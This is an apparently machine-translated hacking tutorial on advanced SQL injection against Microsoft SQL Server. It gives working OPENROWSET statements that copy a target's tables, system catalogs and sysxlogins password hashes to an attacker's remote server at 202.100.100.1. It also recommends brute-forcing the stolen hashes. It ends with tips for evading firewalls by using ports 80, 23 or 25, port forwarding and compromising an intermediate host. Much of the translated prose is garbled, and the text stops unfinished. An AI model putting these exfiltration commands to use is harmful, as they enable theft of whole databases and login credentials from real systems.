Author: apachy
Irrill a water, write a little advanced application about SQL INJECTION, for SQL Server. I assume that you have known the basic concept of SQL INJECTION.
[Objective Detection] When most people realize the threat of SQL Injection and after a repair, it may be difficult to find the place where it is. But if you want to succeed, you will need to calm and patience. Of course, you will also need a little luck;) If there is a source, you must look patiently carefully. In a huge system, it is difficult to do it. As long as there is a vulnerability, it is enough to threaten the entire system. The embankment of a thousand miles, collapsed in the ant hole.
Here, some of the advanced usage of some Injection is mainly summarized. How to find that the vulnerability is not this theme, you can refer to my previous article "Discover Alternative INJECTION", INJECTION does not exist in the web page, the application also exists, can never see the trees and do not see the forest. The understanding and understanding of any technology is striving to excerfene, and the role will be exhausted. Master-class:
First, open the remote database Basic syntax Select * from OpenRowSet ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123', 'select * from table1') parameter: (1) OLEDB Provider Name (2) Connection Character String (OLEDB data source or ODBC connection string) (3) SQL statement
The connection string parameters can be any and ports used to connect, such as select * from openrowset ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433;', 'SELECT * From table ')
Second, the replication database utilizes an Injection vulnerability, and you can get information in the database through numerous exhaustive detections. Usually manual inputs, it is used to detect a few or more lengths of a length (such as to crack the password). But still wants to be more simple, simply write a program to automate this process. Later, I found that the characters used to use both procedures, such as all the data in a "backup" field in the database, which seems to be not possible. There is no more simple way. Of course, copy the entire database! Prerequisites: I need to install SQL Server in this unit and have a public IP. To copy the entire database of the target host, you must first establish a connection on the target host and the database on your machine (how to establish a remote connection on the target host, just have already talked), and then all remote tables of INSERT to the local table.
Basic syntax: INSERT INTO OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123', 'select * from table1') Select * from table2 This row statement copy all data in Table2 table on Table2 table on the target host Go to the Table1 table in the remote database. The actual use of the IP address and port of the connection string are appropriately modified, pointing to where you need, such as Insert Into OpenRowSet ('sqloledb', 'UID = SA; PWD = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433; ',' select * from table1 ') Select * from table2 It is to be noted that the premise to successfully perform this statement is that it is necessary to build a Table1 locally, and the structure of Table1 must be in the same time on Table2 on the target host. . In order to get the structure of Table2, it is necessary to start from the system database. First, you need to know the knowledge of some SQL Server system database constructs. When the new user database is created, some system tables are included in the database, and information related to this database is included in this table. Table information, field name, field type, storage procedure, etc. are stored in sysdatabases, sysobjects, syscolumns. Therefore, it is possible to obtain the construction information of the database on the target host by copying these critical system tables. Methods as below:
INSERT INTO OPENROWSET ('sqloledb', 'uid = sa; pwd = Hack3r; network = dbmssocn; address = 202.100.100.1, 1433;', 'select * from _sdatabases') Select * from master.dbo.sdatabases
insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _syscolumns') select * from user_database.dbo.syscolumns
After that, you can see the library structure of the target host from the local database, which is easy, not much, copy database: INSERT INTO OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433; ',' Select * from table1 ') SELECT * from Database..table1
INSERT INTO OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433;', 'SELECT * from table2') Select * from database..table2 ..... .
Third, copy the Haxi table (HASH)
This is actually an extension application of the above replicated database. The login password is stored in sysxlogins. As follows: insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins give After Hash, violent cracking can be performed. This requires a little luck and a lot of time.
4. The most fundamental premise of the above-mentioned several ways to handle these methods is to require a target host to connect to the local host, so it is necessary to consider the factors of the firewall. Before all the above moves, you must first determine one thing: Does there have no firewall exists.
For a firewall restriction, you can try to change the port, such as 80, an imaginary icon to the firewall to access the webpage, to deceive the purpose. INSERT INTO OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1 ,80;' 23, 25 and other ports, you can also perform FireWalk firewall rules to help determine how available connection methods. Local SQL Server needs to modify the port or make a local port forwarding.
Another situation requires consideration, whether SQL Server and Web Server are the same host. It is a lot of ways to determine whether the same host can be directly scanned to the target host has an open 1433 port. You can also let SQL respond to local arbitrary ports, see if there is no alarm of local firewalls, check whether IP is consistent with the IP of Web Server. If it is not in the same host, it is necessary to further determine if the SQL host has a public network IP, whether it can be connected to the outside, whether there is a firewall rule limit (if there is, rule detection). If you are unfortunate, these methods are unable to connect, such as firewall rules only allow the intranet host to access the SQL host. Then you may need a forwarding. This requires a host that can be connected to the Internet for port forwarding. Of course, the premise is that the administrator privilege of this host will be taken first. This situation is complicated, and it is no longer discussed in detail here.
Write to this first, not finished ....
